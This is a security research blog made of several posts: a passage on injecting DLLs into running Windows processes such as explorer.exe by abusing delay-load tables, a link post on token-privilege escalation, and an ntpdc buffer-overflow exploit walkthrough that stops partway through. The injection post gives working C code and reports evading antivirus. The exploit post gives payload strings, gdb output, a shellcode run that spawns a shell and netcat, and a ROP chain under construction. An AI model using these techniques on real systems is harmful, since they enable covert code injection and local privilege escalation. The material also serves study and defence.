
The pseudo IAT referenced is separate from the standard PE IAT; this IAT is specifically for the delay load functions, and is referenced from the delay descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is at RVA 000b1000. The second delay descriptor entry would have a separate RVA for its pseudo IAT, and so on and so forth.

Using WINMM as our delay example, explorer imports one function from it, PlaySoundW. In my particular running instance, it has not been invoked, so the pseudo IAT has not been fixed up yet. We can see this by dumping it’s pseudo IAT entry:

1
2
3

0:022> dps 00690000+000b1000 l2
00741000  006dd0ac explorer!_imp_load__PlaySoundW
00741004  00000000

Each DLL entry is null terminated. The above pointer shows us that the existing entry is merely a springboard thunk within the Explorer process. This takes us here:

0:022> u explorer!_imp_load__PlaySoundW
explorer!_imp_load__PlaySoundW:
006dd0ac b800107400      mov     eax,offset explorer!_imp__PlaySoundW (00741000)
006dd0b1 eb00            jmp     explorer!_tailMerge_WINMM_dll (006dd0b3)
explorer!_tailMerge_WINMM_dll:
006dd0b3 51              push    ecx
006dd0b4 52              push    edx
006dd0b5 50              push    eax
006dd0b6 6870c67300      push    offset explorer!_DELAY_IMPORT_DESCRIPTOR_WINMM_dll (0073c670)
006dd0bb e8296cfdff      call    explorer!__delayLoadHelper2 (006b3ce9)

The tailMerge function is a linker-generated stub that’s compiled in per-DLL, not per function. The __delayLoadHelper2 function is the magic that handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp, this function handles calling LoadLibrary/GetProcAddress and patching the pseudo IAT. As a demonstration of how this looks, I compiled a binary that delay links dnslib. Here’s the process of resolution of DnsAcquireContextHandle:

0:000> dps 00060000+0001839c l2
0007839c  000618bd DelayTest!_imp_load_DnsAcquireContextHandle_W
000783a0  00000000
0:000> bp DelayTest!__delayLoadHelper2
0:000> g
ModLoad: 753e0000 7542c000   C:\Windows\system32\apphelp.dll
Breakpoint 0 hit
[...]
0:000> dd esp+4 l1
0024f9f4  00075ffc
0:000> dd 00075ffc l4
00075ffc  00000001 00010fb0 000183c8 0001839c
0:000> da 00060000+00010fb0 
00070fb0  "DNSAPI.dll"
0:000> pt
0:000> dps 00060000+0001839c l2
0007839c  74dfd0fc DNSAPI!DnsAcquireContextHandle_W
000783a0  00000000

Now the pseudo IAT entry has been patched up and the correct function is invoked on subsequent calls. This has the additional side effect of leaving the pseudo IAT as both executable and writable:

0:011> !vprot 00060000+0001839c
BaseAddress:       00371000
AllocationBase:    00060000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY

At this point, the DLL has been loaded into the process and the pseudo IAT patched up. In another additional twist, not all functions are resolved on load, only the one that is invoked. This leaves certain entries in the pseudo IAT in a mixed state:

00741044  00726afa explorer!_imp_load__UnInitProcessPriv
00741048  7467f845 DUI70!InitThread
0074104c  00726b0f explorer!_imp_load__UnInitThread
00741050  74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start    end        module name
74630000 746e2000   DUI70      (pdb symbols)

In the above, two of the four functions are resolved and the DUI70.dll library is loaded into the process. In each entry of the delay load descriptor, the structure referenced above maintains an RVA to the HMODULE. If the module isn’t loaded, it will be null. So when a delayed function is invoked that’s already loaded, the delay helper function will check it’s entry to determine if a handle to it can be used:

HMODULE hmod = *idd.phmod;
    if (hmod == 0) {
        if (__pfnDliNotifyHook2) {
            hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
            }
        if (hmod == 0) {
            hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
            }

The idd structure is just an instance of the InternalImgDelayDescr described above and passed into the __delayLoadHelper2 function from the linker tailMerge stub. So if the module is already loaded, as referenced from delay entry, then it uses that handle instead. It does NOT attempt to LoadLibrary irregardless of this value; this can be used to our advantage.

Another note here is that the delay loader supports notification hooks. There are six states we can hook into: processing start, pre load library, fail load library, pre GetProcAddress, fail GetProcAddress, and end processing. You can see how the hooks are used in the above code sample.

Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here.

Limitations

Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so.

The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported function of the portable executable, and exists today on modern systems.

Another limitation is that, because at it’s core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary…).

In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications.

Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

Abuse

When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process.

The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

Local Process

The local process is the most simple and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though.

The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio.

With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

IMAGE_DELAYLOAD_DESCRIPTOR*
findDelayEntry(char *cDllName)
{
    PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
    PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + 
            pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
    DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
    IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

    // iterate over entries 
    for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
        char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
        if (strcmp(_cDllName, cDllName) == 0){
            pImgResult = entry;
            break;
        }
    }

    return pImgResult;
}

Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.

Remote Process

The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user.

With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and it’s directories, and locate the appropriate delay entry we’re targeting.

This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.

When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer.

The code for this is pretty simple:

HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;

CoInitialize(NULL);

hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, 
                           IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
    pIShellDispatch->EjectPC();
    pIShellDispatch->Release();
}

CoUninitialize();

Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.

Remote Process – All Fixed

One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost.

Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby “tricking” the helper function into once again loading that descriptor’s DLL.

In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name.

Conclusions

I should make mention that I tested this strategy across several next gen AV/HIPS appliances, which will go unnamed here, and none where able to detect the cross process injection strategy. It would seem overall to be an interesting challenge at detection; in remote processes, the strategy uses the following chain of calls:

OpenProcess(..);

ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table 
ReadRemoteProcess(..); // read delay entry 1...n

VirtualProtectEx(..);
WriteRemoteProcess(..);

That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons.

Special thanks to Stephen Breen for reviewing this post

References

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
[3] https://github.com/hatRiot/DelayLoadInject
[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

http://dronesec.pw/
Abusing Token Privileges for EoPBryan Alexander
1 September 2017 at 21:00

Abusing Token Privileges for EoP

http://dronesec.pw/

By: Bryan Alexander

1 September 2017 at 21:00

This is just a placeholder post to link off to Stephen Breen and I’s paper on abusing token privileges. You can read the entire paper here[0]. I also recommend checking out the blogpost he posted on Foxglove here[1].

[0] https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt
[1] https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

http://dronesec.pw/
ntpdc local buffer overflowBryan Alexander
6 January 2015 at 21:10

ntpdc local buffer overflow

http://dronesec.pw/

By: Bryan Alexander

6 January 2015 at 21:10

Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash as the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it’d be a fun exploit to write, and it was. There are a few quarks to it that make it of particular interest, of which I’ve detailed below.

As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:

1
2
3

$ python -c 'print "A"*600' | ntpdc
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' unknown
Segmentation fault

Loading into gdb on an x86 Debian 7 system:

gdb-peda$ i r eax edx esi
eax            0x41414141   0x41414141
edx            0x41414141   0x41414141
esi            0x41414141   0x41414141
gdb-peda$ x/i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14]
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Notice the checksec results of the binary, now compare this to a snippet of the paxtest output:

Mode: Blackhat
Linux deb7-32 3.2.0-4-486 #1 Debian 3.2.63-2+deb7u2 i686 GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

And the result of Debian’s recommended hardening-check:

$ hardening-check /usr/bin/ntpdc 
/usr/bin/ntpdc:
 Position Independent Executable: no, normal executable!
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: no, not found!

Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:

1 2	`$ cat /proc/sys/kernel/randomize_va_space 2`

I’ll explain why the above is interesting in a moment.

So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:

gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
   0xb7fa1d79 <el_gets+25>: test   al,0x2                   ; test lower byte against 0x2
   0xb7fa1d7b <el_gets+27>: je     0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
   0xb7fa1d7d <el_gets+29>: mov    ebp,DWORD PTR [esi+0x2c] ; doesnt matter 
   0xb7fa1d80 <el_gets+32>: mov    DWORD PTR [esp+0x4],ebp  ; doesnt matter
   0xb7fa1d84 <el_gets+36>: mov    DWORD PTR [esp],esi      ; doesnt matter
   0xb7fa1d87 <el_gets+39>: call   DWORD PTR [esi+0x318]    ; call a controllable pointer

I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.

Naturally, we should figure out where our payload junk is and go from there.

gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
 ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start      End        Perm  Name
0x08048000 0x08068000 r-xp  /usr/bin/ntpdc
0x08068000 0x08069000 r--p  /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p  /usr/bin/ntpdc
[snip]

Our payload is copied into BSS, which is beneficial as this will remain unaffected by ASLR, further bonus points because our binary wasn’t compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. A value at 0x806a9e1 satisfies both the +0x14 and +0x318 requirements:

gdb-peda$ x/wx 0x806a9cd+0x14
0x806a9e1:  0x6c61636f
gdb-peda$ x/wx 0x806a9cd+0x318
0x806ace5:  0x41414141

After figuring out the offset in the payload for ESI, we just need to plug 0x806a9cd in and hopefully we’ll have EIP:

$ python -c 'print "A"*485 + "C"*4 + "A"*79 + "\xcd\xa9\x06\x08" + "C"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
$ r < crash.info

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0x43434343 ('CCCC')
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x43434343 ('CCCC')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3d0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3d4 --> 0x0 
0012| 0xbffff3d8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3dc --> 0x0 
0020| 0xbffff3e0 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff3e4 --> 0x807b6f8 ('A' <repeats 200 times>...)
0028| 0xbffff3e8 --> 0x807d3b0 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x43434343 in ?? ()

Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:

gdb-peda$ searchmem 0x43434343
Searching for '0x43434343' in: None ranges
Found 755 results, display max 256 items:
 ntpdc : 0x806ace5 ("CCCC", 'A' <repeats 79 times>, "ͩ\006\b", 'C' <repeats 113 times>...)
 ntpdc : 0x806ad3c ('C' <repeats 200 times>...)
 [snip]

And we’ll fill it with \xcc to ensure we’re there (theoretically triggering NX):

$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\xcc"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < crash.info 
[snip]
Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0xcccccccc 
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x806ad3d --> 0xcccccccc
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x806ad38:   int    0xa9
   0x806ad3a:   push   es
   0x806ad3b:   or     ah,cl
=> 0x806ad3d:   int3   
   0x806ad3e:   int3   
   0x806ad3f:   int3   
   0x806ad40:   int3   
   0x806ad41:   int3
[------------------------------------stack-------------------------------------]
0000| 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3f0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3f4 --> 0x0 
0012| 0xbffff3f8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3fc --> 0x0 
0020| 0xbffff400 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff404 --> 0x807b9d0 ('A' <repeats 200 times>...)
0028| 0xbffff408 --> 0x807d688 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0806ad3d in ?? ()
gdb-peda$

Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier, NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension. PAE is a kernel feature that allows 32-bit CPU’s to access physical page tables and doubling each entry in the page table and page directory. This third level of paging and increased entry size is required for NX on x86 architectures because NX adds a single ‘dont execute’ bit to the page table. You can read more about PAE here, and the original NX patch here.

This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.

Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:

$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input2.file 
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAͩ����h����hp�ȷh0�ɷ�' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional

This uses a simple system payload with hard-coded addresses, because at this point it’s an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had to verify this is a common distribution method. An Ubuntu VM said otherwise:

$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2

Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.

Our first priority is stack pivoting; we won’t be able to ROP to victory without control over the stack. There are a few options for this, but the easiest option is likely going to be an ADD ESP, ? gadget. The problem with this being that we need to have some sort of control over the stack or be able to modify ESP somewhere into BSS that we control. Looking at the output of ropgadget, we’ve got 36 options, almost all of which are of the form ADD ESP, ?.

After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:

gdb-peda$ x/6i 0x800143e0
   0x800143e0: add    esp,0x256c
   0x800143e6: pop    ebx
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
   0x800143ea: ret 
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4:  "-1420310755.557158-104120677"
0xbffff3c1:  "WINDOWID=69206020"
0xbffff3d3:  "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd:  "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"

These are environmental variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:

$ export LD_PRELOAD=`python -c 'print "A"*10000'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[..snip..]
gdb-peda$ x/10wx $esp+0x256c
0xbfffedc8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffedd8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffede8: 0x41414141  0x41414141
gdb-peda$

Using some pattern_create/offset magic, we can find the offset in our LD_PRELOAD string and take control over EIP and the stack:

$ export LD_PRELOAD=`python -c 'print "A"*8490 + "AAAA" + "BBBB"'`
$ python -c "print 'A'*485 + '\xe0\x43\x01\x80' + 'A'*79 + '\x8d\x67\x02\x80' + 'B'*600" > input.file
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x13560 
EDX: 0x42424242 ('BBBB')
ESI: 0x41414141 ('AAAA')
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff3bc ("BBBB")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xbffff3bc ("BBBB")
0004| 0xbffff3c0 --> 0x4e495700 ('')
0008| 0xbffff3c4 ("DOWID=69206020")
0012| 0xbffff3c8 ("D=69206020")
0016| 0xbffff3cc ("206020")
0020| 0xbffff3d0 --> 0x47003032 ('20')
0024| 0xbffff3d4 ("NOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
0028| 0xbffff3d8 ("_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting which represents a pretty big problem for exploit portability. For now, I’m going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.

From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor null bytes all of them:

gdb-peda$ vmmap

0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$

One idea I had was to simply construct the address in memory, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:

1 2	`0x800138f2: add edi, esi; ret 0; 0x80022073: call edi`

Using the above, we could pop controlled, non-null values into EDI/ESI, that when added equaled 0x366060 <system>. Many values will work, but I chose 0xeeffffff + 0x11366061:

EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x12f00 
EDX: 0x42424242 ('BBBB')
ESI: 0xeeffffff 
EDI: 0x11366061 
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
EIP: 0x800143ea (ret)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
=> 0x800143ea: ret    
   0x800143eb: nop
   0x800143ec: lea    esi,[esi+eiz*1+0x0]
   0x800143f0: mov    DWORD PTR [esp],ebp
   0x800143f3: call   0x80018d20
[------------------------------------stack-------------------------------------]
0000| 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
0004| 0xbfffefbc --> 0x80022073 --> 0xd7ff 
0008| 0xbfffefc0 ('C' <repeats 200 times>...)
0012| 0xbfffefc4 ('C' <repeats 200 times>...)
0016| 0xbfffefc8 ('C' <repeats 200 times>...)
0020| 0xbfffefcc ('C' <repeats 200 times>...)
0024| 0xbfffefd0 ('C' <repeats 200 times>...)
